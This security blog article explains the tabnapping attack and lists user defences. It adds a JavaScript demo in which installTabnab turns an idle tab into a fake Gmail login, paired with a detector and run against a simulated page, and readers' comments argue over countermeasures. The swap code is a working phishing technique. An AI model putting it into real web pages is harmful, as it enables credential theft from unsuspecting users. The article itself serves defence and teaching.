Tabnapping - Expounded

What is Tabnapping?
With today's multi-core processors everyone wants to use multitasking to the full, and browsing in many tabs at once is no exception. While writing this article I had more than nine browser tabs open on various websites, and I am sure I am not unique in that. Ask me whether I remember which site is open in each tab and the honest answer is no. This habit is exactly what makes a user vulnerable to tabnapping. Many people keep their bank, Gmail, Facebook and other sites open in separate tabs at the same time, because multitasking demands it.
The problem is that this behaviour enables tabnapping attacks. Tabnapping, from the words tab and kidnapping, uses the browser's multi-tab environment to confuse the user: an idle tab is quietly turned into the attacker's phishing page. The phisher no longer has to bait victims by email and, more importantly, no longer has to earn their trust. Users simply log in to a page they believe they opened themselves.
How does it work?
Tabnapping is about the relationship between two web pages. Suppose the victim is viewing Web Page X in one tab and then opens Web Page Y in another tab. If the user does not return to Web Page X for some pre-set time, JavaScript running unobtrusively in the background of Web Page X replaces it with Web Page P, the phishing page. In Raskin's demonstration the page rewrites itself in place (title, favicon and body) rather than navigating anywhere, so the address bar keeps showing the original URL; a cruder variant navigates the idle tab to the phisher's own page. Either way the script modifies the contents of one tab while the user is focused on another, and either way the address bar will not show the site being impersonated.
According to Aza Raskin, creative lead for Firefox at Mozilla, who described the attack in 2010 (his own spelling is "tabnabbing"), it works like this: the user navigates to a normal-looking site; using JavaScript, the site detects that the page has lost focus and swaps its favicon for another one. The replacement favicon could be Gmail's, and the page title changes accordingly, along with the page itself, which is replaced by a Gmail clone that harvests logins. The unwary user, assuming they have a Gmail tab open, quickly scans the many tabs in the browser, picks this fake one, takes it for the real thing (they checked their mail there a few minutes earlier) and assumes they have simply been logged out.
They log back in, at which point the fake page forwards them to the real Gmail, which they never logged out of. Their login appears to have succeeded, so they are none the wiser that anything untoward has happened. Nobody would imagine that a rogue or compromised site, using a small piece of JavaScript, could kidnap and subvert tabs like this.
Raskin also pointed out that every time you include a third-party script or a Flash widget on your page, you leave yourself open to an attacker using your site as a staging ground for this kind of attack. Tabnapping becomes far worse when combined with tools such as CSS history mining (abusing the styling of visited links to detect which sites the user has been to), which lets the attacker tailor the fake page to a site the victim actually uses; browsers have since restricted :visited styling specifically to blunt this, but other side channels for detecting whether a user is currently logged in to a given web service remain. Once the attacker knows which services the victim is logged in to, the attack becomes far more convincing.
Defending yourself from the attack
 - Don't log in on a tab that you haven't opened yourself: since tabnapping relies on you trusting that you opened the tab, if a tab asks you to re-authenticate, close it and go back to the site in a new tab to log in.
 - Look at the URL in your browser's address bar before filling in any form or giving out personal information: unless the attackers can exploit a browser flaw to spoof the address bar, the URL will not match the site the bogus log-in screen imitates.
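The tab swap described under "How does it work?" and the "did this tab change while I was not looking?" rule behind the defence list, as an added example that is not part of the original article or of Raskin's demonstration (his used window blur/focus events; this uses the Page Visibility API). It runs offline in Node against a constructed fake document and window; in a browser you would pass the real document and window instead. All function names (installTabnab, watchTab, makeFakeTab), the sample URL and the titles are this example's own.

```javascript
// Added example, not code from the article or from Raskin's demo. Models the
// in-place tab swap and a user-side watcher for it. Runs in Node against the
// constructed fake tab below; in a browser, pass the real `document`/`window`.

function faviconLink(doc) {
  // Find, or create, the <link rel="icon"> element whose href the swap rewrites.
  let link = doc.querySelector('link[rel~="icon"]');
  if (!link) {
    link = doc.createElement("link");
    link.rel = "icon";
    doc.head.appendChild(link);
  }
  return link;
}

// Attacker side. Once the tab has been hidden for delayMs, rewrite title, favicon
// and body in place. Nothing here touches win.location, so the address bar keeps
// showing the original URL: that is the one thing the victim can still check.
function installTabnab(doc, win, { delayMs, decoy }) {
  let timer = null;
  let swapped = false;
  function swap() {
    timer = null;
    swapped = true;
    doc.title = decoy.title;
    faviconLink(doc).href = decoy.favicon;
    doc.body.innerHTML = decoy.body;
  }
  function onHidden() {
    if (!swapped && timer === null) timer = win.setTimeout(swap, delayMs);
  }
  function onVisible() {
    if (timer !== null) { win.clearTimeout(timer); timer = null; }
  }
  doc.addEventListener("visibilitychange", () => (doc.hidden ? onHidden() : onVisible()));
  return { isSwapped: () => swapped };
}

// Defender side (what an extension or userscript could do). Snapshot title and
// favicon and compare on every tick. A change that coincides with the tab being
// hidden is the tabnapping signature; a change while the user is looking at the
// page is normal (single-page apps retitle constantly) and is ignored.
function watchTab(doc, win) {
  const alerts = [];
  let last = { title: doc.title, favicon: faviconLink(doc).href, hidden: doc.hidden };
  function tick() {
    const now = { title: doc.title, favicon: faviconLink(doc).href, hidden: doc.hidden };
    const changed = now.title !== last.title || now.favicon !== last.favicon;
    if (changed && (last.hidden || now.hidden)) {
      alerts.push({ url: win.location.href, from: last.title, to: now.title });
    }
    last = now;
  }
  return { tick, alerts }; // in a browser: setInterval(watcher.tick, 1000)
}

// Constructed stand-in for document/window so the example runs without a browser.
function makeFakeTab(url, title, favicon) {
  const listeners = {};
  const timers = [];
  const link = { rel: "icon", href: favicon };
  const doc = {
    title, hidden: false,
    head: { appendChild() {} },
    body: { innerHTML: "<p>real article text</p>" },
    querySelector: (sel) => (sel.includes("icon") ? link : null),
    createElement: () => ({}),
    addEventListener: (ev, fn) => (listeners[ev] = listeners[ev] || []).push(fn),
    dispatch: (ev) => (listeners[ev] || []).forEach((fn) => fn()),
  };
  const win = {
    location: { href: url },
    setTimeout: (fn) => timers.push(fn),                         // id = index + 1
    clearTimeout: (id) => { timers[id - 1] = null; },
    fireTimers: () => timers.splice(0).forEach((fn) => fn && fn()), // "time passes"
  };
  return { doc, win };
}

const DECOY = { title: "Gmail", favicon: "/gmail.ico", body: "<form>fake login</form>" };

// Victim leaves the tab and stays away long enough: the swap fires, the watcher flags it.
function runScenario() {
  const { doc, win } = makeFakeTab("https://example.test/news", "Example News", "/news.ico");
  const watcher = watchTab(doc, win);
  const attack = installTabnab(doc, win, { delayMs: 5000, decoy: DECOY });
  watcher.tick();                                      // user is reading: nothing changes
  doc.hidden = true; doc.dispatch("visibilitychange"); // user switches to another tab
  win.fireTimers();                                    // delayMs elapses
  watcher.tick();
  return { swapped: attack.isSwapped(), url: win.location.href, title: doc.title, alerts: watcher.alerts };
}

// Victim comes back before the delay: the pending swap is cancelled, nothing to flag.
function runEarlyReturn() {
  const { doc, win } = makeFakeTab("https://example.test/news", "Example News", "/news.ico");
  const watcher = watchTab(doc, win);
  const attack = installTabnab(doc, win, { delayMs: 5000, decoy: DECOY });
  doc.hidden = true; doc.dispatch("visibilitychange");
  doc.hidden = false; doc.dispatch("visibilitychange");
  win.fireTimers();
  watcher.tick();
  return { swapped: attack.isSwapped(), alerts: watcher.alerts };
}

console.log(runScenario(), runEarlyReturn());
```

Two things are worth noticing when it runs: win.location.href is the same before and after the swap, which is exactly why the address-bar check in the list above works; and the watcher only alerts on a title or favicon change that coincides with the tab being hidden, so ordinary retitling by a page you are actually looking at does not trip it. A real extension would drive tick from setInterval or from a MutationObserver on the title and icon link elements.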
Views by Manvi Sharma
There are 6 Comments

Adding some practices to follow for defending against the attack, as it is a very tedious task to manually verify the URL.
Some preventive measures to be taken care of are:

  • Keep browsers updated.
  • Use anti-malware software.
  • Use anti-malware network devices.


@Sameer: The mentioned techniques won't be effective in preventing the attack, since the traffic would appear legitimate to most anti-malware software and network devices. Moreover, this attack has nothing to do with vulnerabilities in the browser application. Though to prevent this attack one solution could be to disable JavaScript in the browser, which would affect the user's browsing experience.

@Prafull:
Anyway, controlling traffic would definitely reduce the attack surface, based on the concept of hardening.
At the browser level you can utilize plug-ins and tools designed to filter out malicious sites and those that contain malicious code. This would give you an added layer of defense. Keeping the browser updated will add such functionality to your defense arsenal.

@Sameer:
Could you please elaborate on how you are going to distinguish malicious traffic directed to a C&C server corresponding to a tab in a Tabnapping attack.

@Prafull: Below are some of the checks to maintain browser security in general:

1. Configure privacy settings: e.g. deselect third-party cookies.

2. Configure security settings: get a notification when sites try to install add-ons, block reported attack sites, block reported forgeries, deselect "remember passwords for sites".

3. Disable JavaScript.

4. Enable pop-up blocking.

5. Don't sync.

6. Turn on automatic updates.

7. Use secure protocols: TLS 1.2.


Points 2, 3 and 6 can help you out as an aid to prevent the attack. Point 6, turn on automatic updates, can help if ever a patch comes for such an attack (hypothetically).

@Sameer: As pointed out in my previous comment, disabling JavaScript is one possible solution to keep the Tabnapping attack at bay. But implementing the controls highlighted by you in the other points won't be effective in reducing the attack area corresponding to Tabnapping, since it is not trying to exploit any issue or vulnerability in the browser.